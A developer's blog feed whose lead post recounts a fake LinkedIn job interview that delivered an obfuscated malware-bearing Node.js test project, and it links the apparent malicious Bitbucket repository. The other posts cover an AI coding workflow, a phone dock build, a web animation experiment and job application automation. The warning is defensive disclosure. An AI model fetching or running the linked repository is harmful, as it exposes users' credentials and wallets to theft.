Latest Posts (15 found)
David Dodda 1 months ago

How I Almost Got Hacked By A 'Job Interview'

I was 30 seconds away from running malware on my machine. The attack vector? A fake coding interview from a "legitimate" blockchain company. Here's how a sophisticated scam operation almost got me, and why every developer needs to read this. Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works. The message was smooth. Professional. "We're developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure." I've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code reviews. I'm usually paranoid about security - or so I thought. This looked legit. So I said yes to the call. Before our meeting, Mykola sent me a "test project" - standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough. The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one. Here's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do - I started poking around the codebase without running it first. Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush. I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work. Then I had one of those paranoid developer moments. Before hitting , I threw this prompt at my Cursor AI agent: "Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc." And holy sh*t. Sitting right in the middle of was this beauty: Obfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed. I decoded that byte array: When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto wallets, files, passwords, your entire digital existence. Here's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their infrastructure set up to burn evidence fast. I ran the payload through VirusTotal - check out the behavior analysis yourself . Spoiler alert: it's nasty. This wasn't some amateur hour scam. This was sophisticated: The LinkedIn Profile : Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even had those cringy LinkedIn posts about "innovation" and "blockchain consulting." The Company : Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts about "transforming real estate with blockchain." They even had affiliated pages and follower networks. The Approach : No red flags in the initial outreach. Professional language. Reasonable project scope. They even used Calendly for scheduling. The Payload : The malicious code was positioned strategically in the server-side controller, ready to execute with full Node.js privileges when admin functionality was accessed. Here's what made this so dangerous: Urgency : "Complete the test before the meeting to save time." Authority : LinkedIn verified profile, real company, professional setup. Familiarity : Standard take-home coding test. Every developer has done dozens of these. Social Proof : Real company page with real employees and real connections. I almost fell for it. And I'm paranoid about this stuff. One simple AI prompt saved me from disaster. Not fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious patterns before executing unknown code. The scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub repos, npm packages, coding challenges. Most of us don't sandbox every single thing. And this was server-side malware. Full Node.js privileges. Access to environment variables, database connections, file systems, crypto wallets. Everything. If this sophisticated operation is targeting developers at scale, how many have already been compromised? How many production systems are they inside right now? Perfect Targeting : Developers are ideal victims. Our machines contain the keys to the kingdom: production credentials, crypto wallets, client data. Professional Camouflage : LinkedIn legitimacy, realistic codebases, standard interview processes. Technical Sophistication : Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side execution. One successful infection could compromise production systems at major companies, crypto holdings worth millions, personal data of thousands of users. If you're a developer getting LinkedIn job opportunities: Always sandbox unknown code . Docker containers, VMs, whatever. Never run it on your main machine. Use AI to scan for suspicious patterns . Takes 30 seconds. Could save your entire digital life. Verify everything . Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity. Trust your gut . If someone's rushing you to execute code, that's a red flag. This scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt exposed the whole thing. The next time someone sends you a "coding challenge," remember this story. Your crypto wallet will thank you. If you're a developer who has run "coding challenges" from LinkedIn recruiters, you should probably read this twice. https://bitbucket.org/0x3bestcity/test_version/src/main/ - not sure how long this will stay up though. Always sandbox unknown code . Docker containers, VMs, whatever. Never run it on your main machine. Use AI to scan for suspicious patterns . Takes 30 seconds. Could save your entire digital life. Verify everything . Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity. Trust your gut . If someone's rushing you to execute code, that's a red flag.

0 views
David Dodda 2 months ago

Laughing in the Face of Fear: How I Accidentally Rewired My Brain Through Movies

"Why do you keep smiling?" My friend's puzzled voice cut through the theater's surround sound as yet another jump scare filled the screen. I hadn't even realized I was doing it. There I was, grinning like an idiot while a demon wreaked havoc on screen - the same kind of creature that would have sent me diving behind couch cushions just a few years ago. "That demon is kind of cute," I whispered back, and immediately wondered where those words had come from. Walking out of that Conjuring: The Last Rites screening, I couldn't shake the question: when did I stop being afraid of horror movies? More importantly, how did it happen without me even noticing? I've always been a scaredy-cat. Horror movies were my kryptonite, the kind of films that left me sleeping with the lights on and checking under beds like a paranoid child. So this newfound ability to chuckle at cinematic terror felt like discovering I could suddenly speak a foreign language. As I reflected on this mysterious transformation, three influences kept surfacing in my memory, all carrying the same powerful message: fear loses its grip when you laugh at it . The first was Stephen King's IT , specifically the scene where the Losers Club finally confronts Pennywise. These kids, terrorized by an ancient cosmic horror, make a crucial discovery: the creature that feeds on fear becomes pathetically small when mocked. They literally bully the bully, turning their terror into ridicule. "You're just a clown!" they shout, and suddenly this omnipotent force becomes just another playground antagonist. The second was from Harry Potter and the Prisoner of Azkaban . Professor Lupin teaches his students to defeat boggarts, creatures that manifest as your worst fear, with the Riddikulus spell. The magic isn't in complex incantations; it's in forcing yourself to imagine your fear in something ridiculous. Snape in your grandmother's dress. A spider wearing roller skates. Fear transformed into comedy. The third influence was more gradual but perhaps most impactful: discovering Wendigoon's YouTube channel. Here was someone who approached the most unsettling horror content, creepypastas, urban legends, true crime, with genuine curiosity and often infectious humor. Watching him dissect a terrifying story with the enthusiasm of a literature professor made me realize that scary content was just content . When you pull back the curtain and analyze the mechanics of horror, the monsters become fascinating rather than frightening. His approach taught me that you could respect the craft of scary storytelling while refusing to be intimidated by it. All three sources delivered the same revolutionary idea: laughter is fear's kryptonite . Without realizing it, these influences had planted something in my subconscious. They'd offered me a new framework for processing scary situations, not as threats to flee from, but as puzzles to solve or absurdities to find amusing. The demon in The Conjuring: The Last Rites wasn't a harbinger of nightmares; it was just another creature stumbling through its prescribed horror movie beats, probably worried about hitting its jump-scare quotas. This shift represents something profound about how we consume media. Stories don't just entertain us; they literally rewire our neural pathways, teaching us new ways to interpret and respond to the world. Every hero's journey we follow, every coping mechanism we witness, becomes part of our own psychological toolkit. The beautiful thing about this accidental transformation is how it's changed my relationship with fear beyond just movies. That presentation at work that used to paralyze me? Now I picture the audience in their underwear, not because someone told me to, but because I've learned that fear shrinks under the spotlight of absurdity. The anxiety-inducing news cycle? Sometimes I can step back and see the cosmic comedy in our collective human drama, the way we all scramble around taking ourselves so seriously on this tiny rock spinning through space. This doesn't mean becoming callous or dismissing real dangers. It means developing the superpower to choose your response to fear, to ask yourself whether this particular monster deserves your terror or your chuckles. Maybe the most magical thing about both IT and Harry Potter isn't the supernatural elements, it's the reminder that we have more control over our inner landscape than we think. Every day, we're casting spells on ourselves with the stories we tell, the media we consume, the frameworks we adopt for making sense of the world. Sometimes, without even realizing it, we learn to laugh in the face of fear. And once you've done that, you discover something wonderful: most of our demons are just wearing costumes, waiting for someone brave enough to point and giggle. Riddikulus , indeed.

0 views
David Dodda 4 months ago

Most AI Code is Garbage. Here's How Mine Isn't.

Note: All the exact prompts and templates I used are included at the bottom of this article, plus a link to get even more prompts. Most developers spend months building their application, only to realize at the end they want to burn everything down and start over again. Tech debt, they call it. I haven't met a single developer who hasn't felt the urge to rewrite everything from scratch. In the age of AI, this pain hits faster and harder. You can generate massive amounts of code in days, not months. The siren call to rewrite comes in weeks instead of months, sometimes even days. But here's the thing - I just spent the past 5 weeks shipping a project with over 100k lines of backend code, with over 10 backend services, and I haven't felt the call to rewrite it. Not once. The total cost? $450 in AI credits over 3 weeks of intense development. The result? A production-ready backend that I'm actually proud of. Here's exactly what made this possible: 4 documents that act as guardrails for your AI. Document 1: Coding Guidelines - Every technology, pattern, and standard your project uses Document 2: Database Structure - Complete schema design before you write any code Document 3: Master Todo List - End-to-end breakdown of every feature and API Document 4: Development Progress Log - Setup steps, decisions, and learnings Plus a two-stage prompt strategy (plan-then-execute) that prevents code chaos. This isn't theory. This is the exact process I used to generate maintainable AI code at scale without wanting to burn it down. But first, let me show you exactly why this framework is necessary... Here's the brutal truth: LLMs don't go off the rails because they're broken. They go off the rails because you don't build them any rails. You treat your AI agent like an off-road, all-terrain vehicle, then wonder why it's going off the rails. You give it a blank canvas and expect a masterpiece. Think about it this way - if you hired a talented but inexperienced developer, would you just say "build me an app" and walk away? Hell no. You'd give them: Coding standards Architecture guidelines Project requirements Regular check-ins But somehow with AI, we think we can skip all that and just... prompt our way to success. The solution isn't better prompts. It's better infrastructure. You need to build the roads before you start driving. I spent about a week creating these four documents before writing a single line of application code. Best week I ever invested. These aren't just documents - they're the rails that keep your AI on track. Every chat I open in my IDE includes these four docs as context. This document covers every technology you intend to use in your project. Not just a list of technologies - the actual best practices, code snippets, common pitfalls, and coding style choices for each technology. Here's what mine included: Setup and architectural conventions Folder and file structure standards ESLint configuration and rules (Airbnb TypeScript standards) Prettier configuration for code formatting Naming conventions for variables, methods, classes Recommended patterns for controllers, services, repositories, DTOs Testing standards with Jest CI/CD pipeline setup guidelines You can generate this document using ChatGPT with research mode on. I used a detailed prompt that asks for comprehensive guidelines covering setup conventions, coding standards, tooling integration, testing standards, and CI/CD practices. (See the exact prompt at the bottom of this article.) How to use this document: Give it to your Cursor agent to generate rulesets for your project (creates rules in ) Include it as context with every request you make I did both. The second option will increase your bill, but the results are worth it. You need a strong database design for the AI to build off. No shortcuts here. Use an LLM to create this structure by giving it your application scope and asking it to generate the database design. But you must review the database structure against your requirements and make sure it can handle all the features you want to build. I use a 4-phase prompt approach: entity identification, table structure definition, constraints and indexes, and finally DBML export for visualization. (Complete prompts are at the bottom.) At the end, you should have a file (used by most database visualization tools). This becomes your single source of truth. Every API, every feature, every data operation references this structure. This is an end-to-end list of all the tasks you need to finish to build your application, from start to finish. This doesn't just have to be a todo list. I created an API-todo list which had a list of all the APIs I need to make for my frontend to function. It outlined the entire application scope. You can reference content from the database structure in this document to ensure everything aligns. I use another 4-phase approach here: feature area breakdown, API endpoint definition, implementation task creation, and task organization with prioritization. (Detailed prompts at the bottom.) Pro tip: Keep this document updated as you complete tasks. It becomes a progress tracker and helps prevent scope creep. This contains the steps you took to set up your project, the file structure, the build pipeline, and any other crucial information. If you used an agent to set up your project, just ask it to create this document for you. The prompt covers setup and foundation, implementation decisions, build and deployment processes, and learnings from issues encountered. (Full prompt template at the bottom.) The Magic: These 4 documents get added to every chat I open in my IDE. Yes, the context might be large, but Cursor will "significantly condense it to fit the context." As you develop new features and finish tasks in your todo list, make sure you ask the agent to update all your docs (todo list, development progress). Thinking models have come a long way, but thinking alone isn't enough. I use a two-stage prompt approach for every feature or task: Stage 1: Plan Stage 2: Execute The advantage of this two-stage approach is you get to review the plan, not the code. When you review the plan, after execution you're just verifying if the generated code matches the plan - which is much easier than reviewing code. This also grounds the agent to only execute on the current plan, preventing it from going off the rails. Here's how it works in practice: Planning Stage : "I need to build user authentication. Create a detailed plan for implementing this feature, including all the files that need to be created/modified, the database changes required, and the API endpoints needed." Review : I review the plan, make adjustments, approve it. Execution Stage : "Execute the plan we just created. Implement the user authentication feature exactly as outlined in the plan." This simple change transformed my development process. No more surprise architectural decisions buried in generated code. Let me be honest about what really happens when you implement this framework. Code Quality : The generated code actually follows your standards. No more random variable names or inconsistent patterns. Maintainability : When you come back to code after a week, you can actually understand it because it follows your documented patterns. Speed : Once the framework is set up, feature development is blazingly fast. The AI has clear rails to run on. Confidence : You stop second-guessing every piece of generated code because you know it was built to your specifications. Documentation Drift : Even if you're updating docs after every chat, they will always slip from the actual code. I set aside a couple of hours every few days to review the docs and sync them up with the code. I use a 4-phase documentation sync process: git diff analysis, gap analysis, critical updates, and validation. (Complete sync prompts at the bottom.) Context Window Costs : Including these documents in every chat increases your bill. But honestly, it's worth every penny for the quality improvement. Setup Time : That initial week of document creation feels slow when you just want to start coding. But it pays dividends later. Maintenance Overhead : You need to actually update these documents as your project evolves. Skip this and you're back to chaos. Here's the mindset shift that changes everything: You're no longer a developer. You're a manager of AI developers. And like any good manager, you need to solve the productivity challenges of your team. Nothing kills developer productivity like waiting for your AI agent to finish executing. I've found two approaches to handle this: Develop the near-impossible skill of watching paint dry. Don't feed your brain with YouTube shorts, Twitter scrolling, or blog reading. Just stare at the content being generated and review code when you have enough to review. It's harder than it sounds. But it works. Work on multiple tasks at once. But since growing extra heads isn't an option, you need the oldest cybernetic augmentation known to humanity: pen and paper. Dump all the context needed for a task onto paper. This helps with context switching and lets you get more done. When the agent is working on one task, you switch to another. You're going from the mindset of individual contributor to managing a team of semi-proficient interns. We're screwed here. I haven't found a working solution for estimating timelines in the AI age. All I know is setting timelines is hard and gets exponentially harder when you throw AI into the mix. Here's something funny: When I use my two-step plan-execute approach, sometimes the LLM adds timelines to the end of the plan. They sometimes range from a couple of weeks to a couple of months. But in practice, it usually takes the LLM about 30-60 minutes to execute most tasks. There's a joke about middle management killing productivity somewhere in there. If you want to get good at using AI for coding, learn from the community. I took inspiration from random comments on the r/cursor subreddit and different blog articles on Hacker News. (Shout out to Harper Reed and his " My LLM codegen workflow atm " blog, where I picked up the two-stage plan-execute idea.) The framework works. The 4-document approach creates the rails your AI needs to stay on track. The two-stage prompting keeps features focused and reviewable. As LLMs get cheaper and better, this stuff gets easier. Right now, Claude 4.0 is my go-to model for most tasks. I use o3 when I need to debug really nasty bugs. Tool calling is going to be crucial for coding tasks in the future. I'm also looking forward to text diffusion models getting good. Stop treating AI like magic. Start treating it like the powerful but inexperienced team member it is. Give it structure, give it guidance, and watch it build something you're actually proud of. Follow for more articles like this. I have a few more AI/LLM related pieces in the pipeline. Here are all the exact prompts I used in this article. For even more advanced prompts and templates, check out my complete collection: Get Advanced AI Coding Prompts (Free) Document 1: Coding Guidelines - Every technology, pattern, and standard your project uses Document 2: Database Structure - Complete schema design before you write any code Document 3: Master Todo List - End-to-end breakdown of every feature and API Document 4: Development Progress Log - Setup steps, decisions, and learnings Coding standards Architecture guidelines Project requirements Regular check-ins Setup and architectural conventions Folder and file structure standards ESLint configuration and rules (Airbnb TypeScript standards) Prettier configuration for code formatting Naming conventions for variables, methods, classes Recommended patterns for controllers, services, repositories, DTOs Testing standards with Jest CI/CD pipeline setup guidelines Give it to your Cursor agent to generate rulesets for your project (creates rules in ) Include it as context with every request you make Planning Stage : "I need to build user authentication. Create a detailed plan for implementing this feature, including all the files that need to be created/modified, the database changes required, and the API endpoints needed." Review : I review the plan, make adjustments, approve it. Execution Stage : "Execute the plan we just created. Implement the user authentication feature exactly as outlined in the plan."

0 views
David Dodda 6 months ago

Building Complexity from Simplicity: An Interactive Web Experiment

Have you ever looked at something visually complex and wondered, "How in the world did they do that?" What if I told you that behind some of the most mesmerizing visual interactions, theres often just a handful of simple rules? Recently, I crafted a simple web experiment called Snake Eyes , aiming precisely at that, transforming basic, straightforward rules into something surprisingly beautiful and engaging. Lets dive into how this works. Imagine a grid of squares, each containing a smaller circle. Here are the rules governing each square: Attraction : The circle within each square moves slightly toward your cursor when you move your mouse around. Scaling Animation : When you click anywhere on the screen, the circles scale up briefly, creating a wave-like animation. Color Cycling : Every click also cycles the colors of the circles and the background in a coordinated manner, producing vibrant visual feedback. These rules, individually, are easy to grasp. Theres nothing complicated here, just position tracking, scaling animations, and color changes. Circle Movement : Each circle calculates its distance from your cursor. The closer your cursor, the more significant the pull towards it. Farther circles barely move, while nearer ones noticeably shift. Wave Effect : When clicking, circles animate outward from the click position. This animation delay is directly proportional to their distance from your click, creating a fluid, rippling wave effect. Dynamic Colors : With each click, the circles change color in sequence, and the background shifts subtly to a complementary shade, ensuring harmony and contrast. Heres the magic: When you multiply these simple interactions across dozens or even hundreds of elements, complexity emerges naturally. The interplay of movement, timing, and color creates visually captivating patterns far greater than the sum of its parts. Less is More : Even minimal rules can produce rich, engaging visuals. Timing Matters : Smooth, carefully timed animations create appealing interactions. Harmony in Design : Complementary colors and coordinated animations enhance the overall visual experience significantly. Exploring these interactions first-hand is not only fun but also inspiring. By experimenting with simple rulesets and basic animations, you'll discover just how powerful and creative simplicity can be. So, next time you marvel at something visually complex, remember: complexity often starts with simplicity, just scaled, repeated, and beautifully orchestrated. link to the experiment - https://daviddodda.com/experiments/snake-eyes.html link to the code - https://github.com/daviddodda1/developer_portfolio_minimal/blob/main/experiments/snake-eyes.html Attraction : The circle within each square moves slightly toward your cursor when you move your mouse around. Scaling Animation : When you click anywhere on the screen, the circles scale up briefly, creating a wave-like animation. Color Cycling : Every click also cycles the colors of the circles and the background in a coordinated manner, producing vibrant visual feedback. Circle Movement : Each circle calculates its distance from your cursor. The closer your cursor, the more significant the pull towards it. Farther circles barely move, while nearer ones noticeably shift. Wave Effect : When clicking, circles animate outward from the click position. This animation delay is directly proportional to their distance from your click, creating a fluid, rippling wave effect. Dynamic Colors : With each click, the circles change color in sequence, and the background shifts subtly to a complementary shade, ensuring harmony and contrast. Less is More : Even minimal rules can produce rich, engaging visuals. Timing Matters : Smooth, carefully timed animations create appealing interactions. Harmony in Design : Complementary colors and coordinated animations enhance the overall visual experience significantly.

0 views
David Dodda 10 months ago

From 3D Modeling Noob to Building the Perfect Phone Dock

Hey, quick story about how I created my perfect phone dock. So I'm scrolling YouTube one day and stumble across this slick iPhone standby dock by Scott. Clean design, wireless charging, even a spot for AirPods. Love it. Only problem? I've got an Android. Perfect chance to level up my 3D modeling skills. I'm still a beginner with Onshape, but hey - best way to learn is to build something you actually want, right? So I fired up the software and started modeling. On my first attempt I built this chunky brick with a solid back wall. Looked decent, had spots for the phone and my Mi Watch. But had one big downside - my Motorola Edge supports 50W wireless charging. Sounds great until you realize what happens when you pump that much power through a wireless charger... The whole thing Hit 85-90 degrees at the hottest parts and the PLA plastic started to soften and sag where it came in contact with the charging puck. Not ideal when you're trying to work and your phone dock is slowly morphing into modern art. Version 2 got smarter. Added ventilation slots, even designed spots for 30mm cooling fans. I know its over kill. But sometimes you gotta go big before you can go home. Turns out just dropping the charging power solved the heat issue (you just use a low wattage charge brick). Classic over-engineering. But the story doesn't end there. Upgraded my watch to this cool open-source BangleJS that lets you run your own application that your write in javascript. but it has a different charging mechanism thats not comparable with the version 2 dock. so one more major iteration, this time I dont want it to take up too much space, I dont want it bulky, something thats really simple. heres the 3rd version of the dock. considerably smaller footprint, takes way less material to print, has vents only at the charge coil. I also moved the charge area to the front of the dock instead of the top. has decent cable management too. on android you dont have a standmy dock mode, so I use this app called StandbyDock Pro (one-time payment, none of that subscription nonsense). Now I've got this whole command center setup - calendar, music controls and some really cool clocks. Want to build your own? I'll drop the 3D models and Onshape project links below. the on-shape project is parametric, so you can tweak it for whatever phone/watch combo you're running. onshape link - https://cad.onshape.com/documents/d94f0a5e3dbdc238eee0df12/w/20a0c54cbcca88e40ed6379d/e/1c566268f8cf71fcad356f0f thingiverse (stl files) - https://www.thingiverse.com/thing:6930050 Android App - https://play.google.com/store/apps/details?id=br.com.zetabit.ios_standby&hl=en_IN&pli=1 I am a noob when it comes to 3d modeling, so I know this is not the perfect version. I got it to a place where I am happy using it on my desk. That's it - catch you in the next one. ps: this was an old project I did, just getting around to writing about it, I have something really good cooking up using ai. watch out for that announcement soon.

0 views
David Dodda 10 months ago

How I Automated My Job Application Process. (Part 3)

Welcome to the final part of this series. In Part 1 , I showed you the proof of concept. In Part 2 , we dove into the actual application. Now it's time for the good stuff - all the ways everything went wrong before it went right. Remember when I said the email system deserved its own article? Well, here it is. It's a story of hubris, AWS rejections, and what happens when you try to run your own email server. (Spoiler: Nothing good.) I wanted something simple: a system that could send and receive emails programmatically and provide a decent ui to view sent emails and reply to incoming emails. Here's how that "simple" requirement turned into a two-week adventure. First thought: "I'll just use Gmail's SMTP server!" Their API documentation is a nightmare You need to use OAuth 2.0 to authenticate and make API requests. They're really not fond of automated emails Even their business accounts have strict limits The real kicker? This used to be dead simple. Back in the day, you just had to enable the "less secure apps" option in your account settings, and boom - you could fire off emails using your username and password with nodemailer. No OAuth dance, no security theater, just simple SMTP auth. But Google killed that flow, and now we're left with a more complex setup that takes way more time to get running. Next thought: "Fine, I'll use ProtonMail - they're privacy focused!" Requires a business account Need to submit a request form Have to get approved for SMTP access Spoiler: They don't approve automation use cases AWS seemed perfect: Built for programmatic email sending Great documentation Reasonable pricing Even handles incoming mail via S3 buckets I built a whole system around it: Outgoing emails through SES Incoming emails saved to S3 Lambda function to process responses MongoDB to track everything It worked beautifully in testing. Then I applied for production access... Turns out "I want to send automated job applications" isn't what they want to hear. Who knew? "Fine," I thought, "I'll run my own email server. How hard can it be?" (Those words should be engraved on every developer's tombstone.) I found this great tool called Mailcow that handles everything: SMTP server IMAP support Web interface Spam filtering The setup process was actually smooth: Spin up an server (I used an ec2 instance here) Configure DNS records Set up Mailcow Open the required ports... Oh wait. AWS blocks SMTP ports by default. You have to request access. And guess what their response was? Back to the drawing board. Okay, no AWS. I'll use a regular VPS where I have full port access! Got Mailcow running on a cheap VPS I grabbed during Black Friday sales. Everything looked good: Server up and running All ports open DNS configured TLS certificates in place I could receive emails! Victory! ...but I couldn't send any. And honestly? I never figured out why. The server was configured, the ports were open, everything looked right on paper - but no emails would go through. After countless attempts and configuration tweaks, I did what any sane developer would do: I shelved the entire project. At this point, I had sunk two weeks into this email adventure with nothing to show for it. It was time to step back and rethink everything. Then one day, while taking a break from this project, I came across this video by Joe Barnard (the BPS.space guy): A rant on personal engineering projects In it, he makes this brilliant point about the difference between company projects and personal projects. In a company, you optimize for things like cost, scalability, and perfect systems integration. But with personal projects? Your biggest challenge isn't making it cheap or efficient - it's actually finishing the damn thing. He talks about how in a company, if one approach fails, you can buy another solution, hire consultants, or modify the requirements. But in a personal project, you're the only one responsible for everything. Your biggest risk isn't going over budget - it's the project never getting done at all. So I did what I should have done from the start: Used Mailgun for sending emails Set up their inbound routing to forward replies to my regular email Added my email as BCC on all applications Called it a day Was it the most elegant solution? No. Was it the cheapest? No. Did it work? Yes. Did it get me over the finish line? Also yes. In the end, I sent out about 250 job applications in 20 minutes. Total cost? About $5 in API fees. The irony? I got a job offer before I even finished the project. Not from the automated applications - turns out networking still works better. But here's the real plot twist: talking about this project during my technical interview actually helped land me the job. When they asked about challenging projects I'd worked on, I walked them through everything - the script execution system, the data pipeline, the email server saga. Nothing demonstrates your technical chops quite like explaining why you spent two weeks trying to run your own SMTP server before admitting defeat. Sometimes the projects that don't quite work out teach us the most valuable lessons - and make for the best interview stories. Start with the boring solution If something's been solved, use that solution Your clever idea probably isn't worth the trouble Every "I'll just build it myself" decision needs serious justification Define "good enough" Perfect email deliverability isn't needed for a personal project You can forward emails instead of building an inbox Sometimes BCC'ing yourself is the right solution Know when to quit Two weeks on email infrastructure was too long "I've already spent X time on this" is a trap The best solution is the one that ships A working project beats a perfect plan You can always improve it later Sometimes "later" means "never," and that's okay Could this project be better? Absolutely: The email generation could be batched to reduce API costs The UI could be prettier LinkedIn integration would be nice Job board scraping could be automated Will I do any of that? Probably not. I have a job now, and more importantly, I learned what I needed to learn. The code lives at jaas.fun if you want to check it out. Feel free to fork it, improve it, or use it as a cautionary tale about overengineering. And if you're applying for jobs right now and want to use this tool, message me on LinkedIn or email me at [email protected] . If enough people need it, I might even turn it into a proper product. Even though I landed a job (starting in a few days!), I'm not done building things. Nights, weekends, and that sweet spot between coffee and sleep? That's building time. My next project tackles another part of the job hunt puzzle: "Pimp My Resume" - a tool for enhancing and auto-customizing your resume for specific job listings. Because if you thought automating job applications was fun, wait until you see what happens when we let AI loose on resume optimization. Stay tuned. This one's going to be interesting. Thanks for following this series! If you want to talk about job automation, overengineering, or making personal projects that actually ship, find me on Twitter or LinkedIn . Their API documentation is a nightmare You need to use OAuth 2.0 to authenticate and make API requests. They're really not fond of automated emails Even their business accounts have strict limits Requires a business account Need to submit a request form Have to get approved for SMTP access Spoiler: They don't approve automation use cases Built for programmatic email sending Great documentation Reasonable pricing Even handles incoming mail via S3 buckets Outgoing emails through SES Incoming emails saved to S3 Lambda function to process responses MongoDB to track everything SMTP server IMAP support Web interface Spam filtering Spin up an server (I used an ec2 instance here) Configure DNS records Set up Mailcow Open the required ports... Server up and running All ports open DNS configured TLS certificates in place Used Mailgun for sending emails Set up their inbound routing to forward replies to my regular email Added my email as BCC on all applications Called it a day Start with the boring solution If something's been solved, use that solution Your clever idea probably isn't worth the trouble Every "I'll just build it myself" decision needs serious justification Define "good enough" Perfect email deliverability isn't needed for a personal project You can forward emails instead of building an inbox Sometimes BCC'ing yourself is the right solution Know when to quit Two weeks on email infrastructure was too long "I've already spent X time on this" is a trap The best solution is the one that ships A working project beats a perfect plan You can always improve it later Sometimes "later" means "never," and that's okay The email generation could be batched to reduce API costs The UI could be prettier LinkedIn integration would be nice Job board scraping could be automated

0 views
David Dodda 11 months ago

How I Automated My Job Application Process. (Part 2)

Welcome back! In Part 1, I showed you how I built a proof of concept to automate job applications using Python scripts. Now it's time for the fun part - turning those scripts into a proper application. Here's what I learned: the gap between "it's a working POC" and "it's a real application" is where dreams go to die. But we're going to cross that gap anyway. Those Python scripts evolved into different script types in the application, each handling a specific part of the process. Every job search became a "campaign" with its own pipeline. Here's how it works: 2. Initial Cleanup: A script turns that mess into structured JSON like this: 3. Job Fetching: Another script hits each job URL and grabs the full posting (with polite delays between requests because we're not savages) 4. Job Data Cleaning: This script uses AI to turn job postings into clean, structured data including: Contact email Application instructions Full job description in markdown Additional metadata (salary, location, requirements) 5. Email Generation: Takes your resume + job data and crafts personalized applications that don't sound like they came from a robot Each campaign is isolated. While a campaign can only run one script at a time (like going from cleanup to fetching to email generation), different campaigns run independently. Think of it like having multiple assembly lines - if one line stops, the others keep humming along. A script breaking in one campaign won't mess with jobs running in another. I could tell you I chose each piece of technology after careful consideration of all possible options. But the truth? I went with what I knew would get the job done: Frontend: Next.js with Shadcn for UI components Backend: Express.js and nodejs (with typescript) Database: MongoDB for the job data Queue System: Redis for background jobs AI Integration: Modular setup supporting multiple providers The application lives at jaas.fun (Job Application Automation System - I'm great at names, I know). Each campaign in the system is completely isolated. This was crucial because: Different job boards need different scripts Rate limits hit at different times You want to test new approaches without breaking existing ones The campaign schema tracks everything: Raw HTML from job boards Cleanup scripts Generated JSON Email templates Processing status Each type of script gets specific functions based on its role: Cleanup scripts: Access to read raw HTML and save cleaned JSON Fetch scripts: Network access to job boards and data storage Email generation scripts: Access to AI models and resume data Email sending scripts: Access to email services and campaign status updates No script can access functions outside its type - a cleanup script can't send emails, and an email script can't fetch new jobs. It's like giving each worker exactly the tools they need, nothing more. This is where things get really interesting. Remember how we need to run untrusted code (our cleanup and processing scripts) safely? Enter the script execution system. Here's how it works: Each script gets queued in Redis with: Campaign ID Script type (cleanup, fetch, email generation) Script content A worker process runs continuously, waiting for new jobs. It uses to create a sandboxed environment for each script. Why? Because running arbitrary JavaScript is dangerous, and I enjoy sleeping at night. Each script runs in its own sandbox with: A custom that streams to Redis Access to only its input data Complete isolation from the main system No artificial time limits (because processing 100 jobs takes longer than processing 1) The logging system is pretty neat. Instead of writing to files or console, every log message gets: Timestamped Stored in Redis by campaign and script type Streamed back to the UI in real-time The best part? The whole thing is crash-proof. If a script fails, the campaign gets marked as failed but nothing else breaks. If the worker crashes, it restarts and picks up where it left off. You can literally close your browser, go get coffee, maybe actually prepare for those interviews you're about to get. When a script finishes, the worker: Takes the output and saves it to the right place in MongoDB Updates the campaign status Cleans up any temporary data Moves on to the next job And because it's all queue-based, you can have multiple workers running if you need to process more campaigns. Let me walk you through how data actually flows through the system: Raw HTML Processing: User dumps raw HTML from job boards into a campaign A script using Cheerio extracts basic details (job ID, title, salary) Smart error handling catches missing fields early HTML gets minified to save storage (we went from 175KB to 32KB per job) Job Details Fetching: System hits each job URL with proper headers (looking like a real browser) Handles different request types (GET for main page, POST for "how to apply") Adds delays between requests (2-3 seconds) to be nice to job boards Handles timeouts and expired job postings gracefully AI-Powered Data Cleaning: Turns messy HTML into structured job data Extracts everything from salary ranges to required skills Formats job descriptions as clean markdown Every response includes metadata about processing time and data quality Cover Letter Generation: Pulls your resume from a configured source (GitHub in my case) Matches your skills against job requirements Generates both HTML and plain text versions Even includes metadata about which skills matched Fails fast if critical info is missing Here's where things get really interesting. The email generation system isn't just sending form letters - it's creating completely personalized applications: Smart Resume Handling: Pulls your resume from a configured source Parses skills and experience Maps your background to job requirements Template-Free Generation: No generic "I saw your posting" emails Each letter references specific job details System tracks key points addressed Includes metadata about skill matches Quality Control: Generates both HTML and plain text versions Fails fast if critical info is missing Tracks missing recommended fields Analyzes tone and content Sending System: Handles rate limiting automatically BCC's you on all applications The system even includes metadata about how well your experience matches the job requirements. It's like having a really picky editor who happens to be really, really fast. Remember how in Part 1 I mentioned the email system? Oh boy. That deserves its own article. In Part 3, I'm going to tell you about: Getting rejected by AWS The pitfalls of self-hosted SMTP servers Understanding why big companies don't want you sending automated job applications Finally finding a solution that works Plus, I'll tell you how I got a job offer before even finishing this project. (Spoiler: It involves accidentally automating myself into a corner.) In the meantime, check out jaas.fun for: The complete source code Guide on writing scripts and using the application (written with the same attention to detail as my commit messages - "fixed stuff") Video demo of the system in action Want to know when Part 3 drops? The one with all the juicy email server drama? Follow me on Twitter or LinkedIn . It has all the lessons learned about email infrastructure, rate limiting, and why not all shortcuts lead to where you think they will. Raw HTML Storage: You dump in raw HTML from job boards Contact email Application instructions Full job description in markdown Additional metadata (salary, location, requirements) Email Sending: The final step that actually gets your applications out the door Frontend: Next.js 